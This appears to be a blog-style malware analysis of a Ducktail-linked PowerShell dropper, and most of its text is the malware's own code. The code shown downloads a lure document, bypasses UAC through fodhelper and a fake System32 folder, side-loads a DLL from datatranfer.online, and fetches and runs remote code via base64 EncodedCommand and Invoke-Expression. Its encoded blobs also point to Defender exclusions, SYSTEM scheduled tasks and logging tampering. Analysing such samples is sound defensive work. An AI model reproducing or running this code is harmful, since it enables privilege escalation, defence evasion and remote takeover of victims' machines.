$mtx = New-Object System.Threading.Mutex($false, "RUNNING");
$lockAcquired = $mtx.WaitOne(0);
$lockAcquiredChild = $mtx_child.WaitOne(0);
if ($lockAcquired -eq $true -and $lockAcquiredChild -eq $true) 
{
    $mtx.ReleaseMutex();
    Write-Host "Mutex is not locked";
    $isUACOpen = (Get-ItemProperty HKLM:\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System).EnableLUA;
     
    if($isUACOpen -eq 1)
    {
        $isUACOpen = (Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System).ConsentPromptBehaviorAdmin;
    }
    Write-Host $isUACOpen;
    if($isUACOpen -eq 0)
    {
        Write-Host "ko can bypass uac";
        Start-Process "cmd.exe" -WindowStyle hidden -Verb runas -ArgumentList ("/c start /min "" powershell.exe -WindowStyle hidden  -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JABhAHkAdwBjAHgAdABoAGkAYgBkAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBkAEcARQB2AGMASABNAHYATwBHAE0AeABaAEQARgBoAE0AVABVAHkATQBtAFUAdwBNAHoAYwB3AE4AVwBOAGsATQBHAEoAaABOAG0AVgBsAE0AagBCAG0ATgBEAGQAbABNADIATQA9ACIAKQApADsACgAkAHQAdABmAG8AYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEQAbwB2AEwAMgBSAGgAZABHAEYAMABjAG0ARgB1AFoAbQBWAHkATABtADkAdQBiAEcAbAB1AFoAUwA5AGgAYwBHAGsAdgBaAG0AbABzAFoAVwBSAGgAIgApACkAOwAKACQAdQByAGkAIAA9ACAAKAAkAHQAdABmAG8AYgAgACsAIAAkAGEAeQB3AGMAeAB0AGgAaQBiAGQAKQA7AAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADsACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAAoAewAKAAkACgAJAHQAcgB5AHsACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AAoACQAJAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAYwBvAG4AdABlAG4AdAAuAGMAbwBuAHQAZQBuAHQAOwAKAAkACQBiAHIAZQBhAGsAOwAKAAkAfQAKAAkAYwBhAHQAYwBoAAoACQB7AAoACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUACgAJAAkAJABjAG8AdQBuAHQAIAAtAD0AIAAxADsACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsACgAJAH0ACgB9AAoA");
  exit;
    }
    else
    {
        Write-Host "bypass uac run cmd";
        Start-process "powershell.exe"  -ArgumentList ("-EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAYwBtAGQALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAIgAvAGMAIABtAGsAZABpAHIAIAAiACIAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAIgAiACAAJgAgAG0AawBkAGkAcgAgACIAIgBDADoAXABXAGkAbgBkAG8AdwBzACAAXABTAHkAcwB0AGUAbQAzADIAXAAiACIAIAAmACAAYwBvAHAAeQAgACIAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAZgBvAGQAaABlAGwAcABlAHIALgBlAHgAZQAiACIAIAAiACIAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAUwB5AHMAdABlAG0AMwAyAFwAIgAiACIAKQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAgAC0AVwBhAGkAdAA7AA==") -WindowStyle Hidden  -Wait;
        
        while($true){
            Write-Host "download file";
            Download-FileFromUrl -Url "<http://datatranfer.online/api/filedata/dll/7339ea9b8c9c2b7ccd2b7f7977456b41>" -Destination "C:\\Windows \\System32\\propsys.dll";
            Write-Host "Start Temp";
            $command = "/c ""C:\\Windows \\System32\\fodhelper.exe""";
            Write-Host $command;
            $cmdName = "cmd.exe";
            Write-Host  $cmdName;
            $mtx_randomMutex= New-Object System.Threading.Mutex($false, "MyRandomMutex");
            $mtx_randomMutex.WaitOne(0);
            Start-Sleep -Seconds 1;
            write-host "start process, wait stop";
            Start-Process $cmdName -ArgumentList ($command) -WindowStyle Hidden;
            Start-Sleep -Seconds 2;
            try{
              
                $lockAcquired = $mtx.WaitOne(0);
                Write-Host "Lock status $($lockAcquired)";
            }
            catch{
                 Write-Host "An error occurred: $($_.Exception.Message)";
            }
           
            $countWait = 10;
            while($countWait -gt 0 -and  $lockAcquired -eq $true){
                try{
                    Start-Sleep -Seconds 1;
                    $mtx.ReleaseMutex();
                    Start-Sleep -Seconds 1;
                    $countWait--;
                    $lockAcquired = $mtx.WaitOne(0);
                }
                catch{
                     Write-Host "An error occurred 2: $($_.Exception.Message)";
                    break;
                }
            }
            $mtx_randomMutex.ReleaseMutex();
            if($countWait -gt 0){
                write-host "OK";
                break;
            }
            Write-Host "Try again";
        }
       
    }
    Start-Sleep -Seconds 10;
} 
try{
    $mtx.ReleaseMutex();
}catch{
    #bo qua
}
try{
    $mtx_child.ReleaseMutex(); 
}catch{
    #bo qua
}
Write-host "OK";
Wait-Job $job
Remove-Job $job

Ok, let’s start by explaining the code section by section. With some experience in Ducktail, and many decoded PS, we can see how the first file is a docx. This is not exactly a threat, but part of the “hook” document that the user will see on screen, along with some images so that they do not realize that the phishing they downloaded, is already in the post-exploitation phase XD

# Define the file name and paths
$fileName = "069d8df435ac9619e03613b77bc3ffe8.docx"
$tempFolder = [System.IO.Path]::GetTempPath();
$filePath = Join-Path -Path $tempFolder -ChildPath $fileName
$fileUrl = "<http://datatranfer.online/file/docs/$fileName>";

# Create a script block for the job
$scriptBlock = {
    param (
        [string]$filePath,
        [string]$fileUrl
    )

    # Check if the file exists
    if (-not (Test-Path -Path $filePath)) {
        Write-Host "File does not exist. Downloading..."
        
        # Download the file from the URL
        Invoke-WebRequest -Uri $fileUrl -OutFile $filePath
        
        Write-Host "Download complete."
    }

    # Open the file with the default program
    Start-Process -FilePath $filePath
}

# Start the job
$job = Start-Job -ScriptBlock $scriptBlock -ArgumentList $filePath, $fileUrl

# Check if the job is running
if ($job.State -eq 'Running') {
    Write-Host "Job is running. Job ID: $($job.Id)"
} else {
    Write-Host "Job failed to start."
}

function Download-FileFromUrl {
    param (
        [string]$Url,
        [string]$Destination
    )

    $count = 10;
    while($count -gt 0)
    {
        try{
            Invoke-WebRequest -URI $Url -OutFile $Destination;
            Write-Host "Download success $Url";
            break;
        }
        catch
        {
            Write-Host $_.Exception.Message;
            Write-Host "Error download file $Url"
            $count -= 1;
            Start-Sleep -s 15;
        }
    }

The following is a mutex. There is a lot of bibliography about mutexes, so I will limit myself to tell you that it is part of the execution and that you do not get lost with it, the important thing has to be read between the lines:

$isUACOpen = (Get-ItemProperty HKLM:\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Policies\\\\\\\\System).**EnableLUA**;
    if($isUACOpen -eq 1)
    {
        $isUACOpen = (Get-ItemProperty HKLM:\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System).**ConsentPromptBehaviorAdmin**;
    }

The attacker wants "little things" from our UAC, that is, he does not want to be bothered when scaling to ADM, as explained by MS in EnableLUA, and ConsentPromptBehaviorAdmin.

The next part of the code, related to the previous one, is if we have the UAC too exposed, execute the malicious code encoded in base64:

if($isUACOpen -eq 0)
    {
        Write-Host "ko can bypass uac";
        Start-Process "cmd.exe" -WindowStyle hidden -Verb runas -ArgumentList ("/c start /min "" powershell.exe -WindowStyle hidden  -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JABhAHkAdwBjAHgAdABoAGkAYgBkAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBkAEcARQB2AGMASABNAHYATwBHAE0AeABaAEQARgBoAE0AVABVAHkATQBtAFUAdwBNAHoAYwB3AE4AVwBOAGsATQBHAEoAaABOAG0AVgBsAE0AagBCAG0ATgBEAGQAbABNADIATQA9ACIAKQApADsACgAkAHQAdABmAG8AYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEQAbwB2AEwAMgBSAGgAZABHAEYAMABjAG0ARgB1AFoAbQBWAHkATABtADkAdQBiAEcAbAB1AFoAUwA5AGgAYwBHAGsAdgBaAG0AbABzAFoAVwBSAGgAIgApACkAOwAKACQAdQByAGkAIAA9ACAAKAAkAHQAdABmAG8AYgAgACsAIAAkAGEAeQB3AGMAeAB0AGgAaQBiAGQAKQA7AAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADsACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAAoAewAKAAkACgAJAHQAcgB5AHsACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AAoACQAJAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAYwBvAG4AdABlAG4AdAAuAGMAbwBuAHQAZQBuAHQAOwAKAAkACQBiAHIAZQBhAGsAOwAKAAkAfQAKAAkAYwBhAHQAYwBoAAoACQB7AAoACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUACgAJAAkAJABjAG8AdQBuAHQAIAAtAD0AIAAxADsACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsACgAJAH0ACgB9AAoA");
		exit;
    }

This code is subtly different from decoding. It's still base64, but "EncodedCommand" encodes in UTF-16, so we'll make a small modification to our CC:

Decoding “EncodedCommand” Part of PowerShell execution

If we didn't do this, the code would display strange characters, which we would have to remove using replace in our favorite notepad. With this config, we skip that step ;)

And this is the resulting code:

$aywcxthibd=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dGEvcHMvOGMxZDFhMTUyMmUwMzcwNWNkMGJhNmVlMjBmNDdlM2M="));
$ttfob=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("aHR0cDovL2RhdGF0cmFuZmVyLm9ubGluZS9hcGkvZmlsZWRh"));
$uri = ($ttfob + $aywcxthibd);
$count = 10;
while($count -gt 0)
{

	try{
		$content = Invoke-WebRequest -Uri $uri -UseBasicParsing;
		Invoke-Expression $content.content;
		break;
	}
	catch
	{
		Write-Host $_.Exception.Message
		$count -= 1;
		Start-Sleep -s 15;
	}
}

From the structure, it already smells like a URL, and indeed, another URL, which when downloaded has this:

$jfsbsnefd=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Y1NBaVYybHVaRzkzY3lCRVpXWmxibVJsY2lJZ2ZRMEtEUW9qSUVOb1pXTnJJR2xtSUdGdWVTQnZkR2hsY2lCaGJuUnBkbWx5ZFhNZ2MyOW1kSGRoY21VZ2FYTWdhVzV6ZEdGc2JHVmtEUW9rYjNSb1pYSkJiblJwZG1seWRYTWdQU0JIWlhRdFYyMXBUMkpxWldOMElDMU9ZVzFsYzNCaFkyVWdJbEp2YjNSY1UyVmpkWEpwZEhsRFpXNTBaWEl5SWlBdFEyeGhjM01nSWtGdWRHbDJhWEoxYzFCeWIyUjFZM1FpSUh3Z1YyaGxjbVV0VDJKcVpXTjBJSHNnSkY4dVpHbHpjR3hoZVU1aGJXVWdMVzVsSUNKWGFXNWtiM2R6SUVSbFptVnVaR1Z5SWlCOURRb2thWE5TZFc1dWFXNW5JRDBnSkdaaGJITmxPdzBLYVdZZ0tDUjNhVzVrYjNkelJHVm1aVzVrWlhJZ0xXNWxJQ1J1ZFd4c0tTQjdEUW9nSUNBZ0pHbHpVblZ1Ym1sdVp5QTlJQ1IwY25WbE93MEtJQ0FnSUVGa1pDMU5jRkJ5WldabGNtVnVZMlVnTFVWNFkyeDFjMmx2YmxCaGRHZ2dJa002WEZkcGJtUnZkM05jVkdWdGNDSTdEUXA5SUdWc2MyVnBaaUFvSkc5MGFHVnlRVzUwYVhacGNuVnpJQzF1WlNBa2JuVnNiQ2tnZXcwS0lDQWdJQTBLZlNCbGJITmxJSHNOQ2lBZ0lDQWthWE5TZFc1dWFXNW5JRDBnSkhSeWRXVTdEUXA5RFFvZ0RRcHBaaWdrYVhOU2RXNXVhVzVuSUMxbGNTQWtabUZzYzJVcElIc05DaUFnSUNCbGVHbDBPdzBLZlEwS0RRb05DbVoxYm1OMGFXOXVJRVJ2ZDI1c2IyRmtMVVpwYkdWWGFYUm9VbVYwY25rZ2V3MEtJQ0FnSUhCaGNtRnRJQ2dOQ2lBZ0lDQWdJQ0FnVzNOMGNtbHVaMTBrZFhKc0xBMEtJQ0FnSUNBZ0lDQmJjM1J5YVc1blhTUmtaWE4wYVc1aGRHbHZiaXdOQ2lBZ0lDQWdJQ0FnVzJsdWRGMGtiV0Y0VW1WMGNtbGxjeUE5SURNd0xBMEtJQ0FnSUNBZ0lDQmJhVzUwWFNSeVpYUnllVVJsYkdGNVNXNVRaV052Ym1SeklEMGdOUTBLSUNBZ0lDa05DZzBLSUNBZ0lDUnlaWFJ5ZVVOdmRXNTBJRDBnTUEwS0lDQWdJQ1JrYjNkdWJHOWhaRk4xWTJObFpXUmxaQ0E5SUNSbVlXeHpaUTBLRFFvZ0lDQWdkMmhwYkdVZ0tDUnlaWFJ5ZVVOdmRXNTBJQzFzZENBa2JXRjRVbVYwY21sbGN5QXRZVzVrSUMxdWIzUWdKR1J2ZDI1c2IyRmtVM1ZqWTJWbFpHVmtLU0I3RFFvZ0lDQWdJQ0FnSUhSeWVTQjdEUW9nSUNBZ0lDQWdJQ0FnSUNBaklFTm9aV05ySUdsbUlIUm9aU0JrWlhOMGFXNWhkR2x2YmlCbWFXeGxJR0ZzY21WaFpIa2daWGhwYzNSekRRb2dJQ0FnSUNBZ0lDQWdJQ0JwWmlBb1ZHVnpkQzFRWVhSb0lDMVFZWFJvSUNSa1pYTjBhVzVoZEdsdmJpQXRVR0YwYUZSNWNHVWdUR1ZoWmlrZ2V3MEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lBMEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lIUnllWHNOQ2cwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQlNaVzF2ZG1VdFNYUmxiU0F0VUdGMGFDQWtaR1Z6ZEdsdVlYUnBiMjQ3RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnZlEwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdOaGRHTm9ldzBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCWGNtbDBaUzFJYjNOMElDSkdhV3hsSUdGc2NtVmhaSGtnWlhocGMzUnpJR0YwSUNSa1pYTjBhVzVoZEdsdmJpNGdSRzkzYm14dllXUWdZMkZ1WTJWc1pXUXVJanNOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2NtVjBkWEp1T3cwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwTkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBTkNpQWdJQ0FnSUNBZ0lDQWdJSDBOQ2lBZ0lDQWdJQ0FnSUNBZ0lDTWdWWE5sSUZkbFlrTnNhV1Z1ZENCMGJ5QmtiM2R1Ykc5aFpDQjBhR1VnWm1sc1pRMEtJQ0FnSUNBZ0lDQWdJQ0FnSkhkbFlrTnNhV1Z1ZENBOUlFNWxkeTFQWW1wbFkzUWdVM2x6ZEdWdExrNWxkQzVYWldKRGJHbGxiblFOQ2lBZ0lDQWdJQ0FnSUNBZ0lDUjNaV0pEYkdsbGJuUXVSRzkzYm14dllXUkdhV3hsS0NSMWNtd3NJQ1JrWlhOMGFXNWhkR2x2YmlrTkNnMEtJQ0FnSUNBZ0lDQWdJQ0FnSXlCRGFHVmpheUJwWmlCMGFHVWdaRzkzYm14dllXUWdkMkZ6SUhOMVkyTmxjM05tZFd3TkNpQWdJQ0FnSUNBZ0lDQWdJR2xtSUNoVVpYTjBMVkJoZEdnZ0xWQmhkR2dnSkdSbGMzUnBibUYwYVc5dUlDMVFZWFJvVkhsd1pTQk1aV0ZtS1NCN0RRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1YzSnBkR1V0U0c5emRDQWlSRzkzYm14dllXUWdZMjl0Y0d4bGRHVmtPaUFrWkdWemRHbHVZWFJwYjI0aURRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0pHUnZkMjVzYjJGa1UzVmpZMlZsWkdWa0lEMGdKSFJ5ZFdVTkNpQWdJQ0FnSUNBZ0lDQWdJSDBnWld4elpTQjdEUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpUkc5M2JteHZZV1FnWm1GcGJHVmtPaUFrZFhKc0lnMEtJQ0FnSUNBZ0lDQWdJQ0FnZlEwS0lDQWdJQ0FnSUNCOURRb2dJQ0FnSUNBZ0lHTmhkR05vSUZ0VGVYTjBaVzB1VG1WMExsZGxZa1Y0WTJWd2RHbHZibDBnZXcwS0lDQWdJQ0FnSUNBZ0lDQWdJeUJJWVc1a2JHVWdhVzUwWlhKdVpYUWdaWEp5YjNKekRRb2dJQ0FnSUNBZ0lDQWdJQ0JYY21sMFpTMUliM04wSUNKSmJuUmxjbTVsZENCbGNuSnZjam9nSkNna1h5NUZlR05sY0hScGIyNHVUV1Z6YzJGblpTa2lEUW9nSUNBZ0lDQWdJSDBOQ2lBZ0lDQWdJQ0FnWTJGMFkyZ2dldzBLSUNBZ0lDQWdJQ0FnSUNBZ0l5QklZVzVrYkdVZ2IzUm9aWElnWlhKeWIzSnpEUW9nSUNBZ0lDQWdJQ0FnSUNCWGNtbDBaUzFJYjNOMElDSkZjbkp2Y2pvZ0pDZ2tYeTVGZUdObGNIUnBiMjR1VFdWemMyRm5aU2tpRFFvZ0lDQWdJQ0FnSUgwTkNnMEtJQ0FnSUNBZ0lDQWpJRWxtSUhSb1pTQmtiM2R1Ykc5aFpDQm1ZV2xzWldRc0lHbHVZM0psYldWdWRDQjBhR1VnY21WMGNua2dZMjkxYm5RZ1lXNWtJSGRoYVhRZ1ltVm1iM0psSUhKbGRISjVhVzVuRFFvZ0lDQWdJQ0FnSUdsbUlDZ3RibTkwSUNSa2IzZHViRzloWkZOMVkyTmxaV1JsWkNrZ2V3MEtJQ0FnSUNBZ0lDQWdJQ0FnSkhKbGRISjVRMjkxYm5Rckt3MEtJQ0FnSUNBZ0lDQWdJQ0FnYVdZZ0tDUnlaWFJ5ZVVOdmRXNTBJQzFzZENBa2JXRjRVbVYwY21sbGN5a2dldzBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWxKbGRISjVhVzVuSUdSdmQyNXNiMkZrSUdsdUlDUnlaWFJ5ZVVSbGJHRjVTVzVUWldOdmJtUnpJSE5sWTI5dVpITXVMaTRpRFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnVTNSaGNuUXRVMnhsWlhBZ0xWTmxZMjl1WkhNZ0pISmxkSEo1UkdWc1lYbEpibE5sWTI5dVpITU5DaUFnSUNBZ0lDQWdJQ0FnSUgwTkNpQWdJQ0FnSUNBZ2ZRMEtJQ0FnSUgwTkNnMEtJQ0FnSUdsbUlDZ3RibTkwSUNSa2IzZHViRzloWkZOMVkyTmxaV1JsWkNrZ2V3MEtJQ0FnSUNBZ0lDQlhjbWwwWlMxSWIzTjBJQ0pFYjNkdWJHOWhaQ0JtWVdsc1pXUWdZV1owWlhJZ0pHMWhlRkpsZEhKcFpYTWdjbVYwY21sbGN5NGlEUW9nSUNBZ2ZRMEtmUTBLVjNKcGRHVXRTRzl6ZENBaVUyeGxaWEFnTVRCeklqc05DbE4wWVhKMExWTnNaV1Z3SUMxVFpXTnZibVJ6SURFd093MEtWM0pwZEdVdFNHOXpkQ0FpUkc5M2JteHZZV1FnWW05MElqc05Da1J2ZDI1c2IyRmtMVVpwYkdWWGFYUm9VbVYwY25rZ0xYVnliQ0FpYUhSMGNEb3ZMMlJoZEdGMGNtRnVabVZ5TG05dWJHbHVaUzltYVd4bEwzUXZiV0ZwYm1KdmRDNWxlR1VpSUMxa1pYTjBhVzVoZEdsdmJpQWlRenBjVjJsdVpHOTNjMXhVWlcxd1hITjJZM3BJYjNOMExtVjRaU0k3RFFwWGNtbDBaUzFJYjNOMElDSmhaR1FnZEdGemF5STdEUW9rWVdOMGFXOXVJRDBnVG1WM0xWTmphR1ZrZFd4bFpGUmhjMnRCWTNScGIyNGdMVVY0WldOMWRHVWdJa002WEZkcGJtUnZkM05jVkdWdGNGeHpkbU42U0c5emRDNWxlR1VpSUMxQmNtZDFiV1Z1ZENBaVkyaDFZbVZrWVc0Z1pHRjBZWFJ5WVc1bVpYSXViMjVzYVc1bElqc05DaVJ3Y21sdVkybHdZV3dnUFNCT1pYY3RVMk5vWldSMWJHVmtWR0Z6YTFCeWFXNWphWEJoYkNBdFZYTmxja2xrSUNKVFdWTlVSVTBpSUMxU2RXNU1aWFpsYkNCSWFXZG9aWE4wT3cwS0pIUnlhV2RuWlhJZ1BTQk9aWGN0VTJOb1pXUjFiR1ZrVkdGemExUnlhV2RuWlhJZ0xVRjBURzluVDI0N0RRb2tjMlYwZEdsdVozTWdQU0JPWlhjdFUyTm9aV1IxYkdWa1ZHRnphMU5sZEhScGJtZHpVMlYwSUMxQmJHeHZkMU4wWVhKMFNXWlBia0poZEhSbGNtbGxjeUF0Ukc5dWRGTjBiM0JKWmtkdmFXNW5UMjVDWVhSMFpYSnBaWE03RFFwVmJuSmxaMmx6ZEdWeUxWTmphR1ZrZFd4bFpGUmhjMnNnTFZSaGMydE9ZVzFsSUNKNlUyVnlkbWxqWldOb2RXSmxaR0Z1SWlBdFEyOXVabWx5YlRva1ptRnNjMlU3RFFwU1pXZHBjM1JsY2kxVFkyaGxaSFZzWldSVVlYTnJJQzFCWTNScGIyNGdKR0ZqZEdsdmJpQXRVSEpwYm1OcGNHRnNJQ1J3Y21sdVkybHdZV3dnTFZSeWFXZG5aWElnSkhSeWFXZG5aWElnTFZObGRIUnBibWR6SUNSelpYUjBhVzVuY3lBdFZHRnphMDVoYldVZ0lucFRaWEoyYVdObFkyaDFZbVZrWVc0aUlDMUVaWE5qY21sd2RHbHZiaUFpVjJsdVpHOTNjeUJvWld4d1pYSWlPdzBLVjNKcGRHVXRTRzl6ZENBaWNuVnVJSFJoYzJzaU93MEtVM1JoY25RdFUyTm9aV1IxYkdWa1ZHRnpheUF0VkdGemEwNWhiV1VnSW5wVFpYSjJhV05sWTJoMVltVmtZVzRpT3cwS0RRcFhjbWwwWlMxSWIzTjBJQ0pyWlhRZ2RHaDFZeUk3RFFva1RYVjBaWGhKYm5OMFlXNWpaUzVTWld4bFlYTmxUWFYwWlhnb0tUc05DZzBLRFFvTkNnMEtEUW9OQ2cwS0RRb05DZzBLRFFvPQ=="));
$lyulayuejj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Q1EwS1puVnVZM1JwYjI0Z1YyRnBkQzFQYmsxMWRHVjRJSHNOQ2lBZ0lDQndZWEpoYlNBb0RRb2dJQ0FnSUNBZ0lGdHdZWEpoYldWMFpYSW9UV0Z1WkdGMGIzSjVQU1IwY25WbEtWME5DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtUWFYwWlhoSlpBMEtJQ0FnSUNrTkNnMEtJQ0FnSUhSeWVTQjdEUW9nSUNBZ0lDQWdJQ1JOZFhSbGVFbHVjM1JoYm1ObElEMGdUbVYzTFU5aWFtVmpkQ0JUZVhOMFpXMHVWR2h5WldGa2FXNW5MazExZEdWNElDMUJjbWQxYldWdWRFeHBjM1FnSjJaaGJITmxKeXdnSkUxMWRHVjRTV1FOQ2lBZ0lDQWdJQ0FnZDJocGJHVWdLQzF1YjNRZ0pFMTFkR1Y0U1c1emRHRnVZMlV1VjJGcGRFOXVaU2d4TURBd0tTa2dldzBLSUNBZ0lDQWdJQ0FnSUNBZ1UzUmhjblF0VTJ4bFpYQWdMVzBnTlRBd0RRb2dJQ0FnSUNBZ0lIME5DaUFnSUNBZ0lDQWdjbVYwZFhKdUlDUk5kWFJsZUVsdWMzUmhibU5sRFFvZ0lDQWdmU0JqWVhSamFDQmJVM2x6ZEdWdExsUm9jbVZoWkdsdVp5NUJZbUZ1Wkc5dVpXUk5kWFJsZUVWNFkyVndkR2x2YmwwZ2V3MEtJQ0FnSUNBZ0lDQWtUWFYwWlhoSmJuTjBZVzVqWlNBOUlFNWxkeTFQWW1wbFkzUWdVM2x6ZEdWdExsUm9jbVZoWkdsdVp5NU5kWFJsZUNBdFFYSm5kVzFsYm5STWFYTjBJQ2RtWVd4elpTY3NJQ1JOZFhSbGVFbGtEUW9nSUNBZ0lDQWdJSEpsZEhWeWJpQlhZV2wwTFU5dVRYVjBaWGdnTFUxMWRHVjRTV1FnSkUxMWRHVjRTV1FOQ2lBZ0lDQjlEUXA5RFFwWGNtbDBaUzFJYjNOMElDSlhRWFJwYm1jaU93MEtKRTExZEdWNFNXNXpkR0Z1WTJVZ1BTQlhZV2wwTFU5dVRYVjBaWGdnTFUxMWRHVjRTV1FnSWxKVlRrNUpUa2NpT3cwS0RRcFhjbWwwWlMxSWIzTjBJQ0p5ZFc1dWFXNW5JanNOQ2cwS0RRb2pJRU5vWldOcklHbG1JRmRwYm1SdmQzTWdSR1ZtWlc1a1pYSWdhWE1nYVc1emRHRnNiR1ZrSUdGdVpDQmxibUZpYkdWa0RRb2tkMmx1Wkc5M2MwUmxabVZ1WkdWeUlEMGdSMlYwTFZkdGFVOWlhbVZqZENBdFRtRnRaWE53WVdObElDSlNiMjkwWEZObFkzVnlhWFI1UTJWdWRHVnlNaUlnTFVOc1lYTnpJQ0pCYm5ScGRtbHlkWE5RY205a2RXTjBJaUI4SUZkb1pYSmxMVTlpYW1WamRDQjdJQ1JmTG1ScGMzQnNZWGxPWVcxbElDMWw="));
$pcbmli=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("blB1YmxpYyxTdGF0aWM="));
$bokaabh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm8="));
$ukqyefbmi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZXR3UHJvdmlkZXI="));
$qjmjs=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$piualxi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("eXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlRyYWNpbmcuUFNFdHdMb2dQcm92aWRlcg=="));
$csgnlg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Uw=="));
$pwckunaunc=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("b25QdWJsaWMsSW5zdGFuY2U="));
$cnabzidj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tg=="));
$qchnys=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("X2VuYWJsZWQ="));
$ahlqtwa=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bQ=="));
$anfmwtwcbi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Y3MuRXZlbnRpbmcuRXZlbnRQcm92aWRlcg=="));
$dlfjuvi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGVtLkRpYWdub3N0aQ=="));
